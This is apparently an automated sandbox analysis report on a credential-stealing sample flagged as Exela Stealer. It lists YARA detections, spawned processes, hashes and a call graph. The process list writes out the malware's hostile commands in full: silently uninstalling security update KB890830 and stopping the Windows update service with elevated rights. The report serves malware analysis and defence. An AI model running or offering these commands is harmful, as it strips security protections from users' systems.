• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2074477936.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000002.2084894174.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2069028034.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004D.00000002.2087167617.0000019BB60C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  Target ID:78
                                                                                                  Start time:01:11:06
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6051e0000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:79
                                                                                                  Start time:01:11:06
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:80
                                                                                                  Start time:01:11:06
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:81
                                                                                                  Start time:01:11:06
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:82
                                                                                                  Start time:01:11:07
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\wusa.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6f90b0000
                                                                                                  File size:345'088 bytes
                                                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:90
                                                                                                  Start time:01:11:08
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:122
                                                                                                  Start time:01:11:10
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:132
                                                                                                  Start time:01:11:11
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:158
                                                                                                  Start time:01:11:14
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:162
                                                                                                  Start time:01:11:14
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:173
                                                                                                  Start time:01:11:16
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:190
                                                                                                  Start time:01:11:18
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:237
                                                                                                  Start time:01:11:24
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:256
                                                                                                  Start time:01:11:28
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                    • Instruction ID: ce5af8055417fd8513fc3e8ea570dd9ff812549d088db4ddeb1e0c8aace33094
                                                                                                    • Opcode Fuzzy Hash: 6ed5427af39b0f1aad84489ede2032ebae481df8472521d98e5c07c33943667c
                                                                                                    • Instruction Fuzzy Hash: FE313B61909B8E8FE78297A8D8515FDBFF1EF87211F0440BAC00ED75A7CD1C580683A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0e989e2886fa204d1dc31cf71b677cd081b9fbb41f365f11e667ba0c576abbc7
                                                                                                    • Instruction ID: ca56e5e848db5cf7b8de903386127ba51b23786aa2c23470effce89893d5bbaf
                                                                                                    • Opcode Fuzzy Hash: 0e989e2886fa204d1dc31cf71b677cd081b9fbb41f365f11e667ba0c576abbc7
                                                                                                    • Instruction Fuzzy Hash: F421A475A68D994FE795EB3CC461AB9B7D5FF99304B0441B6D00EC32A2DE28AC0587D0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3167d0321e9736f7cb44ee425736880004ceaac8f03ecaede1edaecb65a981b1
                                                                                                    • Instruction ID: d273cc4f5990a090e11a35179fe96a0b63b66ce5f47d45804fca83f7e0ee1862
                                                                                                    • Opcode Fuzzy Hash: 3167d0321e9736f7cb44ee425736880004ceaac8f03ecaede1edaecb65a981b1
                                                                                                    • Instruction Fuzzy Hash: 4121B471B09A588FE755BB38C4956B977A1FF8A305F0041FAE00EC3292DE2DDC458381
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b4706fd74fa7fad6d64fefcf23a45cdf36a86da50694b3b57972883124ef5d43
                                                                                                    • Instruction ID: b018e8f5067fa67cb8bb92f0c58dffbd30e3b02577ec2d95402606c03221d131
                                                                                                    • Opcode Fuzzy Hash: b4706fd74fa7fad6d64fefcf23a45cdf36a86da50694b3b57972883124ef5d43
                                                                                                    • Instruction Fuzzy Hash: 86115C52A4ED850FF354A37C98679F1BBD5DB9722170541B6D14DC3193DC0C9C8783A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a7a9b1bfd1817d84694c227077304afe40e646e3b7f07dcab90534ebc3ec76a1
                                                                                                    • Instruction ID: bd471af454c6cfab2a51a612f46e57984fd69d4f1aa809390e50c0922226a1e2
                                                                                                    • Opcode Fuzzy Hash: a7a9b1bfd1817d84694c227077304afe40e646e3b7f07dcab90534ebc3ec76a1
                                                                                                    • Instruction Fuzzy Hash: FC116075A28D594BE795FB3CC451AB9B395FB99304F0045B9D00EC36A2DE28A8058790
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93ea5ae74571c36c3cc2057543e39ac6e9513cab2f6f1f69674dffdd38a094fa
                                                                                                    • Instruction ID: f8a055658b22fde9ba609ceddf79c9f96c6fa54ea8d10b4b3a6dffbbc616eaa0
                                                                                                    • Opcode Fuzzy Hash: 93ea5ae74571c36c3cc2057543e39ac6e9513cab2f6f1f69674dffdd38a094fa
                                                                                                    • Instruction Fuzzy Hash: 7B11A331715D1C8FE765BB38C455BB97295FB89306F0045BAE00ED3292DE29DC458780
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: afde3b4e0a93d2a2053665e55ec768a6ae922be14111a181ab85c3ee77d1ec0b
                                                                                                    • Instruction ID: b86baa08082fcdedafc33af0633d1eedb75b8ff9432f4a3da6455f4036bd020a
                                                                                                    • Opcode Fuzzy Hash: afde3b4e0a93d2a2053665e55ec768a6ae922be14111a181ab85c3ee77d1ec0b
                                                                                                    • Instruction Fuzzy Hash: 18F02D02F09D090BF7A8B57D9499AB5B7C5D7DA221B404179E10DC2292DC08DC464390
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1785252914.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac340000_Solara.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 55835af90a46c5b747b51da8f2beabaf701851d748f74669053c4a5f2eac072b
                                                                                                    • Instruction ID: de08d4dad482dff1c0499f2151a403b27d77787ab54a2f10db75d5a9d00276c5
                                                                                                    • Opcode Fuzzy Hash: 55835af90a46c5b747b51da8f2beabaf701851d748f74669053c4a5f2eac072b
                                                                                                    • Instruction Fuzzy Hash: E8E0CD10B18A154BE784F62CD441D7973D1D7A4754F444074F80DC32A5CD1CDB8143C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1461240755.00007FFAAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bcd5d1d9d0747b166c89bb63afab52cdef1530c9d073342bdb9c367b12712e3d
                                                                                                    • Instruction ID: 67790b15dae193504b1e92710bcdbb1735b96a20254191193f4653304671ef67
                                                                                                    • Opcode Fuzzy Hash: bcd5d1d9d0747b166c89bb63afab52cdef1530c9d073342bdb9c367b12712e3d
                                                                                                    • Instruction Fuzzy Hash: 87C15862D4EB8A8FF755DB6888195F9BBE0EF02218B0841BED58DC70D3DA18D809C3C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1460740170.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac340000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 702c9f9d6bf47194a1354e9306691208737afffedd09ebbaab158abb8f93f643
                                                                                                    • Instruction ID: b7ac3ddad40f53fe79dcd630e6db920d2771d078b5bda0175ed4860c25ef18c0
                                                                                                    • Opcode Fuzzy Hash: 702c9f9d6bf47194a1354e9306691208737afffedd09ebbaab158abb8f93f643
                                                                                                    • Instruction Fuzzy Hash: F571316390AB868FF705975CE8768F97F50DF52227B0C83B3D48D8A1A3FD14645A46E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1461240755.00007FFAAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cd40463a169b0cfeb9af2d093830cf1f6d7cf8831dfe786e5dd88440f7297497
                                                                                                    • Instruction ID: 79dd216baad71dbe0fde65e3238285e86e023dcf071b5d1710c93cc8f285f19f
                                                                                                    • Opcode Fuzzy Hash: cd40463a169b0cfeb9af2d093830cf1f6d7cf8831dfe786e5dd88440f7297497
                                                                                                    • Instruction Fuzzy Hash: 5E811466D4FB868FF795DB6848695B8BAD0EF02218B1881FED58DCB0C3C918DC0983C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1460740170.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac340000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e205bf163a2df8b39513673f97e020b0675b669ff2610936f703cf707934f13c
                                                                                                    • Instruction ID: f411d823db888aa713944219ed69b4720d9412307416f630693eb65d12728848
                                                                                                    • Opcode Fuzzy Hash: e205bf163a2df8b39513673f97e020b0675b669ff2610936f703cf707934f13c
                                                                                                    • Instruction Fuzzy Hash: B0310C7190CF488FEB58DB5CEC46AA97BE0FB99311F10822FE04D93252DA30A855C7C2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1460192107.00007FFAAC22D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC22D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac22d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 38433f0ba7f99cce66993b48f78a5a29b5a4c4b77ac2755da4b0cda258729daa
                                                                                                    • Instruction ID: 3d33052aad600e2e82f6729997ae7616ad4ede9d141131afa13c134a12488b92
                                                                                                    • Opcode Fuzzy Hash: 38433f0ba7f99cce66993b48f78a5a29b5a4c4b77ac2755da4b0cda258729daa
                                                                                                    • Instruction Fuzzy Hash: 9741257040DBC48FE7569B2998459623FF0EF57320F1505DFE088CB1A7D629E84AC792
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1460740170.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac340000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c023b0ffdf097fa6af164026801078a9a1e03581662be439f1f0a06a12c035a3
                                                                                                    • Instruction ID: 0271e6791920a9b3d5bb0b9134fc27c67e7844fb7ecdbded287a0d8cf6f292f9
                                                                                                    • Opcode Fuzzy Hash: c023b0ffdf097fa6af164026801078a9a1e03581662be439f1f0a06a12c035a3
                                                                                                    • Instruction Fuzzy Hash: 5D21283190CB4C8FEB59DBACD84A7E97FE0EB96321F04416FD048C3152DA74945ACBA2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1460740170.00007FFAAC340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC340000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac340000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                    • Instruction ID: 20e8a060b539b53db3fc0320dd1806c5da9e29431e4e39bc3b3edf9bb3233b1d
                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                    • Instruction Fuzzy Hash: C201677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1461240755.00007FFAAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffaac410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e9501c9666cb96d69163b01ad674e9e03a63af73ad085eab9dc77d9e935bb40c
                                                                                                    • Instruction ID: cc3f163dab0cddd16f152d057789c92e49bfcb4f1806716b55ea64343dfdc7aa
                                                                                                    • Opcode Fuzzy Hash: e9501c9666cb96d69163b01ad674e9e03a63af73ad085eab9dc77d9e935bb40c
                                                                                                    • Associated: 00000029.00000002.1585523921.00007FF65D3BE000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000029.00000002.1586501055.00007FF65D634000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000029.00000002.1586550824.00007FF65D637000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000029.00000002.1586586009.00007FF65D63A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_7ff65d130000_rdqanwpudvuj.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                                                    • Instruction ID: 2541eae0e2babf385aa73b91a2eb9f320ae0aebffc5a39e9c6dee68fa2106ea1
                                                                                                    • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                                                    • Instruction Fuzzy Hash: E2B01274D0D34B84EB102F51D84139832716B08740F540430C80CA33D2DF7D50804B10

Execution Graph

Execution Coverage: 2.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.1%
Total number of Nodes: 897
Total number of Limit Nodes: 2

                                                                                                    Callgraph

                                                                                                    callgraph 0 Function_00000001400026E1 1 Function_00000001400031E1 2 Function_00000001400062E1 3 Function_00000001400064E1 4 Function_0000000140001AE4 39 Function_0000000140001D40 4->39 81 Function_0000000140001BA0 4->81 5 Function_00000001400014E5 76 Function_0000000140001394 5->76 6 Function_00000001400010F0 7 Function_0000000140002FF0 62 Function_0000000140001370 7->62 8 Function_00000001400068F0 32 Function_0000000140006630 8->32 9 Function_00000001400063F1 10 Function_00000001400014F4 10->76 11 Function_0000000140001800 71 Function_0000000140002290 11->71 12 Function_0000000140002500 13 Function_0000000140003200 14 Function_0000000140001000 15 Function_0000000140001E00 14->15 45 Function_0000000140001750 14->45 88 Function_0000000140001FB0 14->88 95 Function_0000000140001FC0 14->95 16 Function_0000000140006301 17 Function_0000000140001503 17->76 18 Function_0000000140001404 18->76 19 Function_0000000140002104 20 Function_0000000140001E10 21 Function_0000000140006610 22 Function_0000000140006411 23 Function_0000000140001512 23->76 24 Function_0000000140006420 25 Function_0000000140003220 26 Function_0000000140002320 27 Function_0000000140002420 28 Function_0000000140001521 28->76 29 Function_0000000140006321 30 Function_0000000140001422 30->76 31 Function_0000000140001530 31->76 33 Function_0000000140001431 33->76 34 Function_000000014000153F 34->76 35 Function_0000000140001440 35->76 36 Function_0000000140001140 52 Function_0000000140001160 36->52 37 Function_0000000140003240 37->7 37->17 37->28 37->30 37->31 37->32 37->33 37->34 37->35 50 Function_000000014000145E 37->50 53 Function_0000000140002660 37->53 58 Function_000000014000156C 37->58 59 Function_000000014000146D 37->59 37->62 67 Function_000000014000157B 37->67 78 Function_0000000140001599 37->78 85 Function_00000001400015A8 37->85 86 Function_00000001400014A9 37->86 96 Function_00000001400016C0 37->96 
